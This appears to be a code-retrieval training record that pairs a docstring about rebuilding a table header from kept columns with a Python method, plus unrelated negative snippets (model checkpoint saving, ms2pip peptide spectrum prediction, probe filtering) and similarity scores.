"def save_checkpoint(self, name):\n timestamp = datetime.datetime.now(self.time_zone).strftime(\"%Y-%m-%d_%H:%M:%S\")\n backup_dir = os.path.join(os.path.dirname(self.path), \"backups\")\n checkpoint_path = os.path.join(backup_dir, \"%s_%s.pickle\" % (timestamp, name))\n pickle.dump(self, open(checkpoint_path, \"wb\"))",
"def _save_state(self, saver, session, data, checkpts_path):\n # Save variable state\n if checkpts_path:\n logging.info('Saving cotrain checkpoint at %s.', checkpts_path)\n saver.save(session, checkpts_path, write_meta_graph=False)\n\n # Save dataset state.\n if self.data_dir:\n logging.info('Saving self-labeled dataset backup.')\n data.save_state_to_file(self.data_dir)",
"def saveCheckpoint(acc, epoch, model, train_hist):\r\n print('Saving..')\r\n state = {\r\n 'model': model,\r\n 'acc': acc,\r\n 'epoch': epoch,\r\n 'rng_state': torch.get_rng_state(),\r\n 'train_hist': train_hist\r\n }\r\n if not os.path.isdir('checkpoint'): # save to checkpoint directory\r\n os.mkdir('checkpoint')\r\n torch.save(state, './checkpoint/ckpt' + '_' + str(epoch+1))",
"def save_checkpoint(self, name):\n path = os.path.join(self.params.dump_path, '%s.pth' % name)\n logger.info(\"Saving %s to %s ...\" % (name, path))\n\n data = {\n 'epoch': self.epoch,\n 'best_metrics': self.scores\n }\n\n logger.warning(\"Saving model parameters ...\")\n data['model'] = self.encoder.model.state_dict()\n data['classifier'] = self.proj\n data['dico_id2word'] = self.data['dico'].id2word\n data['dico_word2id'] = self.data['dico'].word2id\n data['dico_counts'] = self.data['dico'].counts\n # print(self.encoder.pretrain_params)\n data['params'] = self.encoder.pretrain_params.update({k: v for k, v in self.params.__dict__.items()})\n\n torch.save(data, path)",
"def save_checkpoint(checkpoint_dir, epoch, iteration, save_dict):\n os.makedirs(checkpoint_dir, exist_ok=True)\n path = opj(checkpoint_dir, str(epoch) + '.' + str(iteration) + '.ckpt')\n assert epoch == save_dict['epoch'], \"`epoch` != save_dict's `start_epoch`\"\n assert iteration == save_dict['iteration'], \"`iteration` != save_dict's `start_iteration`\"\n if os.path.isfile(path):\n print(\"Overwrite checkpoint in epoch %d, iteration %d :exclamation:\" % (epoch, iteration))\n try:\n torch.save(save_dict, path)\n except Exception:\n raise Exception(\"Fail to save checkpoint\")\n \n print(\"Checkpoint %s saved :heavy_check_mark:\" % (str(epoch) + '.' + str(iteration) + '.ckpt'))",
"async def checkpoint(cls) -> None:",
"def save_checkpoint(self, filename, extra_state):\n self.call_async(0, '_async_save_checkpoint', filename=filename, extra_state=extra_state).gen()",
"def checkpoint(self):\n self.logger.info('Checkpointing Sampler')\n with open(self.resume_file, \"wb\") as f:\n pickle.dump(self, f)",
"def save_checkpoint(\n self, file_name: str, extra_state: Optional[Dict] = None\n ) -> None:\n checkpoint = {\n \"state_dict\": self.agent.state_dict(),\n \"config\": self.config,\n }\n if extra_state is not None:\n checkpoint[\"extra_state\"] = extra_state\n\n torch.save(checkpoint, os.path.join(self.config.CHECKPOINT_FOLDER, file_name))",
"def save_ckpt(objects, epoch, score, ckpt_file):\n state_dicts = {name: obj.state_dict() for name, obj in objects.items() if obj is not None}\n ckpt = dict(state_dicts=state_dicts,\n epoch=epoch,\n score=score)\n may_make_dir(osp.dirname(ckpt_file))\n torch.save(ckpt, ckpt_file)\n msg = '=> Checkpoint Saved to {}'.format(ckpt_file)\n print(msg)",
"def save_checkpoint(self, name=''):\n self.checkpoint_path.mkdir(exist_ok=True)\n if name:\n path = self.checkpoint_path / f'{name}_{self.epoch}.tar'\n else:\n path = self.checkpoint_path / f'{self.epoch}.tar'\n torch.save(self.get_state(), path)",
"def save_checkpoint(self, filename, extra_state):\n if distributed_utils.is_master(self.args): # only save one checkpoint\n utils.save_state(\n filename, self.args, self.get_model(), self.criterion, self.optimizer,\n self.lr_scheduler, self._num_updates, self._optim_history, extra_state,\n )"
] |
[
"0.631536",
"0.6279925",
"0.6237221",
"0.6183434",
"0.6126063",
"0.597565",
"0.59595466",
"0.5867066",
"0.584878",
"0.5820152",
"0.5778265",
"0.5730842",
"0.57096046",
"0.5707325",
"0.5689171",
"0.5687834",
"0.56688297",
"0.56503177",
"0.56482583",
"0.5623402",
"0.5612697",
"0.56050825",
"0.5599473",
"0.55982995",
"0.55963665",
"0.55491596",
"0.55463403",
"0.5534326",
"0.55124736",
"0.54973197"
] |
0.76725084
|
0
|
The cols and left_cols record the indices of the header. Replace the header based on the difference between left_cols and cols.
|
def _reset_header(self):
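        # Keep only the columns still present in left_cols, preserving the original header order.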
new_header = []
for col_name in self.header:
is_left = self.left_cols.get(col_name)
if is_left:
new_header.append(col_name)
self.header = new_header
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def header_data_columns(head_line, data_cols, header):\n\n colnames = head_line.split(\",\")\n\n # Remove triling blancks and end of lines\n colnames = [x.strip() for x in colnames]\n\n # Difference between columns in the header and in the data\n diff = len(data_cols) - len(colnames)\n\n if diff > 0:\n # Add dum headers\n dums = \"\"\n for idiff in range(diff):\n dums = dums + \",dum\" + str(idiff)\n\n new_head = str(head_line.rstrip()) + dums + \" \\n\"\n header.append(new_head)\n\n elif diff < 0:\n sys.exit(\n \"STOP novonix_clean.header_data_columns \\n\"\n + \"REASON less data columns than header names \\n\"\n )\n else:\n header.append(head_line)\n\n return",
"def get_header(col_current, col_shift):\n header = col_current\n for i in range(col_shift):\n header = header.right\n return header",
"def test_empty_cols_allowed(self):\n self.test_table.allow_empty_columns = True\n self.test_table.change_header(Path=1, SectionType=3, Value=4)\n self.assertEqual(self.test_table._header, [\"Path\", None, \"SectionType\",\n \"Value\"])",
"def set_column_headers(self, headers):\n if isinstance(self.columns.idx[0], int):\n self.data = [sorted(headers)] + self.data\n\n increment = [i + 1 for i in self.rows.idx]\n self.rows.idx = [0] + increment\n\n elif isinstance(self.columns.idx[0], str):\n datum = {}\n for i, key in enumerate(self.columns.idx):\n datum.update({key: headers[i]})\n self.data = [datum] + self.data\n\n increment = [i + 1 for i in self.rows.idx]\n self.rows.idx = [0] + increment",
"def _modify_columns(self, cols, X, y=None):",
"def setup_normalyzer_header(design_matrix: DF, annot_cols: List[str], normalyzer_vals:DF) -> DF:\n\n # Get numbers set up as list of stringified numbers ('-1', '0', '0', '1', '1')\n nbr_annot_cols = len(annot_cols)\n sample_head = [-1] + [0] * (nbr_annot_cols - 1) + list(design_matrix['biorepgroup'])\n sample_head_str = [str(e) for e in sample_head]\n\n # Get text-information about each column\n label_row = list(normalyzer_vals.columns)[:nbr_annot_cols] + list(design_matrix['name'])\n\n headers = pd.DataFrame([sample_head_str, label_row])\n headers.columns = normalyzer_vals.columns\n\n return headers",
"def writeExcelHeader(worksheet, titleCols, firstTag, secondTag):\n\tcno = 0\n\tworksheet.write(0, 0, \"Old Tag\")\n\tworksheet.write(0, 1, \"New Tag\")\n\tworksheet.write(1, 0, firstTag)\n\tworksheet.write(1, 1, secondTag)\n\tfor titleCol in titleCols:\n\t\tworksheet.write(3, cno, titleCol)\n\t\tcno = cno + 1",
"def customize_headers(self,executer, tree, cursor, table,custom_headers):\n headers = executer.get_columns(table, cursor)\n tree[\"columns\"] = custom_headers\n\n\n set_width = int(self.column_length_configurator / len(headers))\n\n # Setting columns width and headers\n for column in custom_headers:\n tree.column(column, width=set_width, minwidth=self.min_width)\n tree.heading(column, text=column)",
"def writeExcelHeader(worksheet, titleCols):\n cno = 0\n for titleCol in titleCols:\n worksheet.write(0, cno, titleCol)\n cno = cno + 1",
"def headers_processor(headers):\n def apply_headers(row_set, row):\n _row = []\n pairs = izip_longest(row, headers)\n for i, (cell, header) in enumerate(pairs):\n if cell is None:\n cell = Cell(None)\n cell.column = header\n if not cell.column:\n cell.column = \"column_%d\" % i\n cell.column_autogenerated = True\n _row.append(cell)\n return _row\n return apply_headers",
"def _change_header(self, add=False):\n if self.data['history_file'] is None:\n return\n good_heading = self.data['history_header'] % self.data\n # ^^^ history_header is a string with %(abc)s replacements.\n headings = self.data['headings']\n history_lines = self.data['history_lines']\n previous = ''\n underline_char = '-'\n empty = False\n if not history_lines:\n # Remember that we were empty to start with.\n empty = True\n # prepare header line\n history_lines.append('')\n if len(history_lines) <= 1:\n # prepare underline\n history_lines.append(underline_char)\n if not headings:\n # Mock a heading\n headings = [{'line': 0}]\n inject_location = 0\n first = headings[0]\n inject_location = first['line']\n underline_line = first['line'] + 1\n try:\n underline_char = history_lines[underline_line][0]\n except IndexError:\n logger.debug(\"No character on line below header.\")\n underline_char = '-'\n previous = history_lines[inject_location]\n if add:\n inject = [\n good_heading,\n underline_char * len(good_heading),\n '',\n self.data['nothing_changed_yet'],\n '',\n '',\n ]\n if empty:\n history_lines = []\n history_lines[inject_location:inject_location] = inject\n else:\n # edit current line\n history_lines[inject_location] = good_heading\n logger.debug(\"Set heading from %r to %r.\", previous, good_heading)\n history_lines[underline_line] = utils.fix_rst_heading(\n heading=good_heading,\n below=history_lines[underline_line])\n logger.debug(\"Set line below heading to %r\",\n history_lines[underline_line])\n # Setting history_lines is not needed, except when we have replaced the\n # original instead of changing it. So just set it.\n self.data['history_lines'] = history_lines",
"def write_header(worksheet, curr_row, cols, data_cols, header_format, stages):\n\n ### Merge range function takes the locations of the cells to merge, the data\n ### to write and the cell format. A sample input would look like:\n ### worksheet.merge_range(\"A0:B1\", \"Location\", cell_format_obj)\n ### The above call will merge 4 cells: A0, A1, B0, B1 and fill it with the\n ### value \"Location\". \n \n end_row = curr_row + CELL_HT[\"location\"]\n row_range = cols[0] + str(curr_row) + \":\" + cols[0] + str(end_row)\n worksheet.merge_range(row_range, \"Location\", header_format)\n \n num_pop_cols = sum(map(lambda i: \"pop\" in i, data_cols)) - 1\n num_tfr_cols = sum(map(lambda i: \"tfr\" in i, data_cols)) - 1\n\n col_end = 0\n for i, stage in enumerate(stages):\n \n if stage == \"pop\":\n unit_txt = \" (in millions)\"\n stage_txt = \"Population\"\n col_range = num_pop_cols\n else:\n unit_txt = \"\"\n stage_txt = \"Total Fertility Rate\"\n col_range = num_tfr_cols\n \n col_st = col_end + 1\n col_end = col_st + col_range\n \n curr_row_copy = curr_row\n end_row = curr_row_copy + CELL_HT[\"stage\"]\n\n row_range = (\n cols[col_st] + str(curr_row_copy) + \":\" +\n cols[col_end] + str(end_row)\n )\n \n col_txt = stage_txt + unit_txt\n worksheet.merge_range(row_range, col_txt, header_format)\n\n curr_row_copy = end_row + 1\n end_row = curr_row_copy + CELL_HT[\"stage\"]\n \n col_st_copy = col_st\n \n for column in data_cols:\n if stage in column: \n row_range = cols[col_st_copy] + str(curr_row_copy)\n worksheet.write(row_range, COL_NAME_MAP[column], header_format)\n col_st_copy += 1\n \n\n return end_row + 1",
"def test_same_indizes(self):\n # TODO: Exception\n with self.assertRaises(Exception):\n self.test_table.change_header(Path=1, SectionType=1, Value=2)",
"def header(self, cols, parent_row):\n out = []\n for col in cols:\n if col == 'gau_id':\n out.append(self.name_for('Geographies', parent_row['geography_id']))\n elif col == 'oth_1_id':\n out.append(self.name_for('OtherIndexes', parent_row['other_index_1_id']))\n elif col == 'oth_2_id':\n out.append(self.name_for('OtherIndexes', parent_row['other_index_2_id']))\n else:\n out.append(col)\n return out",
"def InsertColumnInfo(self, before, colInfo):\r\n\r\n self._header_win.InsertColumnInfo(before, colInfo)\r\n self._header_win.Refresh()",
"def reorder_cols(df,left=6, right=7):\n cols = list(df.columns)\n cols[left], cols[right] = cols[right], cols[left]\n return df[cols]",
"def _addStatsHeadersToMatrix(self, m):\n\n atoz = \"JKLMNOPQRSTUVWXYZABCDEFGHI\"\n\n counter = 0\n\n for col in m.TopAxis.DataMembers:\n if counter < 26:\n logicalletter = str(atoz[counter])\n col.MemberSigTestHeading = logicalletter\n counter += 1\n else:\n counter = 0",
"def write_top(self, left_header, right_header):\n for i in range(max(len(left_header), len(right_header))):\n if i < len(left_header):\n left = left_header[i]\n else:\n left = ''\n if i < len(right_header):\n right = right_header[i]\n else:\n right = ''\n \n # Add row to header_rows buffer\n left_td = E.TD(left)\n left_td.attrib['class'] = 'left'\n right_td = E.TD(right)\n right_td.attrib['class'] = 'right'\n tr = E.TR(left_td, right_td)\n self.buffers['header_rows'].append(self._serialize(tr))",
"def set_dims_in_hdr(hdr, startx, starty, cols, rows):\n hdr['startX'] = (startx, 'Starting CCD pixel column')\n hdr['endX'] = (startx + cols, 'Ending CCD pixel column+1')\n hdr['startY'] = (starty, 'Starting CCD pixel row')\n hdr['endY'] = (starty + rows, 'Ending CCD pixel row+1')",
"def first_header():\n return \"\"\"\n<th>Target\n<th>Date\n<th colspan=\"2\">UT\n<th>Exp\n<th>Cycle\n<th>No. of\n<th>Filters\n<th>XxY\n<th>Speed\n<th>NX1xNY1\n<th>X1\n<th>Y1\n<th>NX2xNY2\n<th>X2\n<th>Y2\n<th>Grat.\n<th>Slit\n<th>Slit\n<th>ID\n<th>PI\n<th align=\"left\">Comment\n\"\"\"",
"def test_simple_change(self):\n self.test_table.change_header(Path=1, SectionType=2, Value=3)\n self.assertListEqual(self.test_table._header, [\"Path\", \"SectionType\", \"Value\"])",
"def _configure_bintable_header(new_header, table_headers):\n\n # Using a single header to get the column descriptions\n column_info = {}\n for kwd in table_headers[0]:\n if \"TTYPE\" not in kwd:\n continue\n \n colname = table_headers[0][kwd]\n num = kwd.replace(\"TTYPE\", \"\")\n \n cards = []\n for att in ['TTYPE', 'TFORM', 'TUNIT', 'TDISP', 'TDIM']:\n try:\n cards.append(table_headers[0].cards[att+num])\n except KeyError:\n pass # if we don't have info for this keyword, just skip it\n \n column_info[colname] = (num, cards)\n\n # Adding column descriptions and additional info\n for kwd in new_header:\n if \"TTYPE\" not in kwd:\n continue\n \n colname = new_header[kwd]\n num = kwd.replace(\"TTYPE\", \"\")\n \n info_row = column_info.get(colname)\n if not info_row:\n new_header.comments[kwd] = 'column name'\n new_header.comments[kwd.replace(\"TTYPE\", \"TFORM\")] = 'column format'\n continue\n \n info_num = info_row[0]\n cards = info_row[1]\n \n for key, val, desc in cards:\n key_new = key.replace(info_num, num)\n try:\n ext_card = new_header.cards[key_new]\n \n if ext_card[1]:\n val = ext_card[1]\n if ext_card[2]:\n desc = ext_card[2]\n \n new_header[key_new] = (val, desc)\n except KeyError: # card does not already exist, just add new one\n new_header.set(key_new, val, desc, after=kwd)\n\n # Adding any additional keywords from the original cutout headers\n shared_keywords = _combine_headers(table_headers, constant_only=True)\n for kwd in shared_keywords:\n if kwd in new_header: # Don't overwrite anything already there\n continue\n\n if any(x in kwd for x in [\"WCA\", \"WCS\", \"CTY\", \"CRP\", \"CRV\", \"CUN\",\n \"CDL\", \"11PC\", \"12PC\", \"21PC\", \"22PC\"]): # Skipping column WCS keywords\n continue\n\n new_header.append(shared_keywords.cards[kwd])",
"def get_header_table(self , dt, ds = '' , all_ds = '', length = ''):\n index_low = self.unique_dates[ds]['indices'][dt]['low']\n #index_up = self.unique_dates[best_ds]['indices'][dt]['up'] \n hd = self.data[ds]['header_table'][index_low:index_low+length] \n hd['duplicates'] = all_ds \n \n return hd",
"def update_header(self) -> None:\n self.header.partial_reset()\n self.header.point_format_id = self.points.point_format.id\n self.header.point_data_record_length = self.points.point_size\n\n if len(self.points) > 0:\n self.header.update(self.points)\n\n if self.header.version.minor >= 4:\n if self.evlrs is not None:\n self.header.number_of_evlrs = len(self.evlrs)\n self.header.start_of_waveform_data_packet_record = 0\n # TODO\n # if len(self.vlrs.get(\"WktCoordinateSystemVlr\")) == 1:\n # self.header.global_encoding.wkt = 1\n else:\n self.header.number_of_evlrs = 0",
"def reorder_columns(df,first_cols=['']):\n\n last_cols = [col for col in df.columns if col not in first_cols]\n df = df[first_cols+last_cols]\n return(df)",
"def _html_table_headers(self, row_axes, col_axes):\n dsh = self.get_dshape()\n nb_blank_cols = len(row_axes) * 2 # nb of blank cols preprended to\n # each line of the column header\n nb_rows = int(np.prod([dsh[a] for a in row_axes]))\n nb_cols = int(np.prod([dsh[a] for a in col_axes]))\n # col header\n if nb_blank_cols > 0:\n blank_cells = ['']\n blank_cells_attrs = [{'colspan': str(nb_blank_cols)}]\n else:\n blank_cells = []\n blank_cells_attrs = []\n col_header = []\n nb_repets = 1\n span = nb_cols\n for a in col_axes:\n dom = [str(v)\n for v in self.get_domain(a)] # TODO: better dv format\n span /= len(dom)\n # row showing the axis label\n col_header.append(html_list_to_row(blank_cells + [a], 'h',\n blank_cells_attrs +\n [{'colspan': nb_cols}]))\n # row showing domain values\n col_header.append(html_list_to_row(blank_cells + dom * nb_repets, 'h',\n blank_cells_attrs +\n [{'colspan': str(span)}] *\n len(dom) * nb_repets))\n nb_repets *= len(dom)\n\n # row header\n # initialization of all rows because row filling wont be sequential:\n row_header = [[] for i in range(nb_rows)]\n nb_repets = 1\n span = nb_rows\n for a in row_axes:\n # 1st row contains all axis labels:\n row_header[0].append(html_cell(html_div(a, {'class': 'rotate'}), 'h',\n {'rowspan': nb_rows}))\n\n # dispatch domain values across corresponding rows:\n dom = [str(v)\n for v in self.get_domain(a)] # TODO: better dv format\n span /= len(dom)\n for idv, dv in enumerate(dom * nb_repets):\n row_header[\n idv * span].append(html_cell(dv, 'h', {'rowspan': span}))\n\n nb_repets *= len(dom)\n\n return [''.join(r) for r in row_header], col_header",
"def parseColHeader(self, i, j) :\n cell_content = self.processString(self.source_cell.value)\n if self.isEmpty(i,j):\n if self.insideMergeBox(i,j):\n k, l = self.getMergeBoxCoord(i,j)\n \n # If we are in a vertical merge box, skip adding the dimension\n if l == j:\n return\n\n # Update cell content \n cell_content = self.processString(self.r_sheet.cell(k,l).value)\n else:\n return\n\n # Add the value qname to the column_dimensions list for that column\n self.column_dimensions.setdefault(j,[self.sheet_qname]).append(cell_content)\n \n # Add the data to the graph\n resource = self.getColHeaderValueURI(self.column_dimensions[j])\n self.graph.add((resource, RDF.type, self.namespaces['tablink']['ColumnHeader']))\n self.graph.add((resource, self.namespaces['skos']['prefLabel'], Literal(cell_content)))\n self.graph.add((resource, self.namespaces['tablink']['cell'], Literal(self.source_cell_name)))\n return",
"def remove_insertion_columns(self):\n cols = self.get_insertion_columns()\n s = []\n a = 0\n for b in cols:\n if b > a:\n s.append((a, b))\n a = b + 1\n s.append((a, len(self.col_labels)))\n for name, seq in list(self.items()):\n news = []\n for c in s:\n news.append(seq[c[0]:c[1]])\n self[name] = \"\".join(news)",
"def writeheader(fh,colnames):\n for i in range(len(colnames)):\n fh.write('# %d %s\\n'%(i+1,colnames[i]))",
"def set_headers(self,executer, tree, cursor, table, columns_size):\n\n # Getting headers\n headers = executer.get_columns(table, cursor)\n tree[\"columns\"] = headers\n\n # Setting width to all column headers basing on columns amount.\n set_width = int(self.column_length_configurator/len(headers))\n\n\n # Setting columns width and headers\n for column in headers:\n tree.column(column, width=set_width,minwidth=self.min_width)\n tree.heading(column, text=column)"
] |
[
"0.59891915",
"0.5937853",
"0.5717306",
"0.56989044",
"0.55527014",
"0.55497086",
"0.554682",
"0.55163383",
"0.5515728",
"0.5490882",
"0.54661727",
"0.5440973",
"0.5416742",
"0.5407916",
"0.5379768",
"0.53601754",
"0.53495514",
"0.5340874",
"0.5312372",
"0.53079784",
"0.5303606",
"0.5301132",
"0.5295812",
"0.5281456",
"0.52663493",
"0.5237425",
"0.5236226",
"0.5213548",
"0.5213127",
"0.5175083"
] |
0.7232093
|
0
|
Function for each worker to process a list of peptides. The prediction models are chosen based on the model argument. PTMmap, Ntermmap and Ctermmap determine the modifications applied to each peptide sequence. Returns the predicted spectra for all the peptides.
|
def process_peptides(worker_num, data, afile, modfile, modfile2, PTMmap, model):
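    # Initialize the compiled ms2pip backend with the amino acid masses file and the PTM/SPTM modification files.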
ms2pip_pyx.ms2pip_init(afile, modfile, modfile2)
# Prepare output variables
pepid_buf = []
peplen_buf = []
charge_buf = []
mz_buf = []
target_buf = None
prediction_buf = []
vector_buf = []
# transform pandas dataframe into dictionary for easy access
if "ce" in data.columns:
specdict = (
data[["spec_id", "peptide", "modifications", "charge", "ce"]]
.set_index("spec_id")
.to_dict()
)
ces = specdict["ce"]
else:
specdict = (
data[["spec_id", "peptide", "modifications", "charge"]]
.set_index("spec_id")
.to_dict()
)
pepids = data["spec_id"].tolist()
peptides = specdict["peptide"]
modifications = specdict["modifications"]
charges = specdict["charge"]
del specdict
# Track progress for only one worker (good approximation of all workers' progress)
for pepid in track(
pepids,
total=len(pepids),
disable=worker_num != 0,
transient=True,
description="",
):
peptide = peptides[pepid]
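        # Leucine and isoleucine are isobaric, so map L to I before encoding the sequence.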
peptide = peptide.replace("L", "I")
mods = modifications[pepid]
# TODO: Check if 30 is good default CE!
colen = 30
if "ce" in data.columns:
colen = ces[pepid]
        # Peptides longer than 100 residues lead to "Segmentation fault (core dumped)"
if len(peptide) > 100:
continue
# convert peptide string to integer list to speed up C code
peptide = np.array(
[0] + [AMINO_ACID_IDS[x] for x in peptide] + [0], dtype=np.uint16
)
modpeptide = apply_mods(peptide, mods, PTMmap)
pepid_buf.append(pepid)
peplen = len(peptide) - 2
peplen_buf.append(peplen)
ch = charges[pepid]
charge_buf.append(ch)
model_id = MODELS[model]["id"]
peaks_version = MODELS[model]["peaks_version"]
# get ion mzs
mzs = ms2pip_pyx.get_mzs(modpeptide, peaks_version)
mz_buf.append([np.array(m, dtype=np.float32) for m in mzs])
# If using xgboost model file, get feature vectors to predict outside of MP.
# Predictions will be added in `_merge_predictions` function.
if "xgboost_model_files" in MODELS[model].keys():
vector_buf.append(
np.array(
ms2pip_pyx.get_vector(peptide, modpeptide, ch),
dtype=np.uint16,
)
)
else:
predictions = ms2pip_pyx.get_predictions(
peptide, modpeptide, ch, model_id, peaks_version, colen
)
prediction_buf.append([np.array(p, dtype=np.float32) for p in predictions])
return (
pepid_buf,
peplen_buf,
charge_buf,
mz_buf,
target_buf,
prediction_buf,
vector_buf,
)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_spectra(\n worker_num,\n data,\n spec_file,\n vector_file,\n afile,\n modfile,\n modfile2,\n PTMmap,\n model,\n fragerror,\n spectrum_id_pattern,\n):\n ms2pip_pyx.ms2pip_init(afile, modfile, modfile2)\n\n model_id = MODELS[model][\"id\"]\n peaks_version = MODELS[model][\"peaks_version\"]\n\n # transform pandas data structure into dictionary for easy access\n if \"ce\" in data.columns:\n specdict = (\n data[[\"spec_id\", \"peptide\", \"modifications\", \"ce\"]]\n .set_index(\"spec_id\")\n .to_dict()\n )\n ces = specdict[\"ce\"]\n else:\n specdict = (\n data[[\"spec_id\", \"peptide\", \"modifications\", \"charge\"]].set_index(\"spec_id\").to_dict()\n )\n peptides = specdict[\"peptide\"]\n modifications = specdict[\"modifications\"]\n charges = specdict[\"charge\"]\n\n # cols contains the names of the computed features\n cols_n = get_feature_names_new()\n if \"ce\" in data.columns:\n cols_n.append(\"ce\")\n # cols_n = get_feature_names_catboost()\n\n # if vector_file\n dvectors = []\n dtargets = dict()\n psmids = []\n\n # else\n pepid_buf = []\n peplen_buf = []\n charge_buf = []\n mz_buf = []\n target_buf = []\n prediction_buf = []\n vector_buf = []\n\n spectrum_id_regex = re.compile(spectrum_id_pattern)\n\n # Track progress for only one worker (good approximation of all workers' progress)\n for spectrum in track(\n read_spectrum_file(spec_file),\n total=len(peptides),\n disable=worker_num != 0,\n transient=True,\n description=\"\",\n ):\n # Match title with regex\n match = spectrum_id_regex.search(spectrum.title)\n try:\n title = match[1]\n except (TypeError, IndexError):\n raise TitlePatternError(\n \"Spectrum title pattern could not be matched to spectrum IDs \"\n f\"`{spectrum.title}`. \"\n \" Are you sure that the regex contains a capturing group?\"\n )\n\n if title not in peptides:\n continue\n\n peptide = peptides[title]\n peptide = peptide.replace(\"L\", \"I\")\n mods = modifications[title]\n\n if spectrum.precursor_charge:\n charge = spectrum.precursor_charge\n else:\n charge = charges[title] # If charge cannot be parsed from MGF\n\n if \"mut\" in mods:\n continue\n\n # Peptides longer then 101 lead to \"Segmentation fault (core dumped)\"\n if len(peptide) > 100:\n continue\n\n # convert peptide string to integer list to speed up C code\n peptide = np.array(\n [0] + [AMINO_ACID_IDS[x] for x in peptide] + [0], dtype=np.uint16\n )\n\n try:\n modpeptide = apply_mods(peptide, mods, PTMmap)\n except UnknownModificationError as e:\n logger.warn(\"Unknown modification: %s\", e)\n continue\n\n # Spectrum preprocessing:\n # Remove reporter ions and percursor peak, normalize, tranform\n for label_type in [\"iTRAQ\", \"TMT\"]:\n if label_type in model:\n spectrum.remove_reporter_ions(\"iTRAQ\")\n # spectrum.remove_precursor()\n spectrum.tic_norm()\n spectrum.log2_transform()\n\n # TODO: Check if 30 is good default CE!\n # RG: removed `if ce == 0` in get_vector, split up into two functions\n colen = 30\n if \"ce\" in data.columns:\n try:\n colen = int(float(ces[title]))\n except:\n logger.warn(\"Could not parse collision energy!\")\n continue\n\n if vector_file:\n # get targets\n targets = ms2pip_pyx.get_targets(\n modpeptide,\n spectrum.msms,\n spectrum.peaks,\n float(fragerror),\n peaks_version,\n )\n psmids.extend([title] * (len(targets[0])))\n if \"ce\" in data.columns:\n dvectors.append(\n np.array(\n ms2pip_pyx.get_vector_ce(\n peptide, modpeptide, charge, colen\n ),\n dtype=np.uint16,\n )\n ) # SD: added collision energy\n else:\n dvectors.append(\n np.array(\n 
ms2pip_pyx.get_vector(peptide, modpeptide, charge),\n dtype=np.uint16,\n )\n )\n\n # Collecting targets to dict; works for variable number of ion types\n # For C-term ion types (y, y++, z), flip the order of targets,\n # for correct order in vectors DataFrame\n for i, t in enumerate(targets):\n if i in dtargets.keys():\n if i % 2 == 0:\n dtargets[i].extend(t)\n else:\n dtargets[i].extend(t[::-1])\n else:\n if i % 2 == 0:\n dtargets[i] = [t]\n else:\n dtargets[i] = [t[::-1]]\n\n else:\n # Predict the b- and y-ion intensities from the peptide\n pepid_buf.append(title)\n peplen_buf.append(len(peptide) - 2)\n charge_buf.append(charge)\n\n # get/append ion mzs, targets and predictions\n targets = ms2pip_pyx.get_targets(\n modpeptide,\n spectrum.msms,\n spectrum.peaks,\n float(fragerror),\n peaks_version,\n )\n target_buf.append([np.array(t, dtype=np.float32) for t in targets])\n mzs = ms2pip_pyx.get_mzs(modpeptide, peaks_version)\n mz_buf.append([np.array(m, dtype=np.float32) for m in mzs])\n\n # If using xgboost model file, get feature vectors to predict outside of MP.\n # Predictions will be added in `_merge_predictions` function.\n if \"xgboost_model_files\" in MODELS[model].keys():\n vector_buf.append(\n np.array(\n ms2pip_pyx.get_vector(peptide, modpeptide, charge),\n dtype=np.uint16,\n )\n )\n else:\n predictions = ms2pip_pyx.get_predictions(\n peptide, modpeptide, charge, model_id, peaks_version, colen\n )\n prediction_buf.append(\n [np.array(p, dtype=np.float32) for p in predictions]\n )\n\n # If feature vectors requested, return specific data\n if vector_file:\n if dvectors:\n # If num_cpu > number of spectra, dvectors can be empty\n if len(dvectors) >= 1:\n # Concatenate dvectors into 2D ndarray before making DataFrame to reduce\n # memory usage\n dvectors = np.concatenate(dvectors)\n df = pd.DataFrame(dvectors, dtype=np.uint16, copy=False)\n df.columns = df.columns.astype(str)\n else:\n df = pd.DataFrame()\n return psmids, df, dtargets\n\n # Else, return general data\n return (\n pepid_buf,\n peplen_buf,\n charge_buf,\n mz_buf,\n target_buf,\n prediction_buf,\n vector_buf,\n )",
"def get_filtered_probes(seqdf, escores, models, mutate_cutoff, mutate_gap,\n egaps, thresholds, proteins, colors,\n generate_plots=False, spcomb=[(0, 0)], analysis_path=\"\",\n mode=\"custom\", predict_flanks=True, flank_len=0,\n key_colname=\"key\",\n show_model_flanks=False, get_complete_mutated=True,\n primer=\"\", max_mutate_count=2):\n filtered_probes = []\n # iterate through each site num and peak len combination\n for comb in spcomb:\n # get escore and model predictions for each protein\n es_preds = {}\n esplots = {}\n model_preds = {}\n model_plots = {}\n sitenum = comb[0]\n peaklen = comb[1]\n\n # get rows with the current sitenum and peaklen if specified\n if sitenum != 0 and peaklen != 0:\n df = seqdf.loc[(seqdf[\"sites_in_peak\"] == sitenum) & (seqdf[\"peaklen\"] == peaklen)]\n # otherwise use all rows\n else:\n df = seqdf\n # initialize escore and model objects for each protein\n for protein in proteins:\n protein_num = proteins.index(protein)\n es_preds[protein] = escores[protein].predict_sequences(df, key_colname=key_colname)\n esplots[protein] = escores[protein].make_plot_data(es_preds[protein], color=colors[protein_num][0])\n\n model_preds[protein] = models[protein].predict_sequences(df,\n key_colname=key_colname,\n predict_flanks=predict_flanks,\n flank_len=flank_len)\n model_plots[protein] = models[protein].make_plot_data(model_preds[protein],\n color=colors[protein_num][1],\n show_model_flanks=show_model_flanks)\n\n # Generate plots\n if generate_plots:\n sp = SitesPlotter()\n # if need to plot, uncomment this\n sp.plot_seq_combine([esplots, model_plots],\n filepath=\"%s/sitesplot_d%d_p%d.pdf\" %\n (analysis_path, sitenum, peaklen))\n\n # get filtered sequences\n filtered_seqs = {}\n flanks = {}\n print(\"Site filtering...\")\n print(\"Number of sites before mutating:\", len(es_preds[proteins[0]]))\n\n # get sequences with 2 significant binding sites\n sites_mutated = 0\n sites_removed = 0\n failed_mutations = 0\n for key in es_preds[proteins[0]]:\n curr_es_preds = {}\n curr_model_preds = {}\n for protein in proteins:\n curr_es_preds[protein] = es_preds[protein][key]\n curr_model_preds[protein] = model_preds[protein][key]\n #print(key,\"asd\",curr_model_preds[\"ets1\"])\n bs = Sequence(curr_es_preds, curr_model_preds, proteins=proteins,\n escore_cutoff=mutate_cutoff, escore_gap=mutate_gap,\n pbmescores=escores)\n ### print(key, bs.is_valid())\n if bs.is_valid():\n filtered_seqs[key] = bs\n # TODO: move all print statements to a log file\n # print(\"Number of sites mutated:\", sites_mutated)\n # 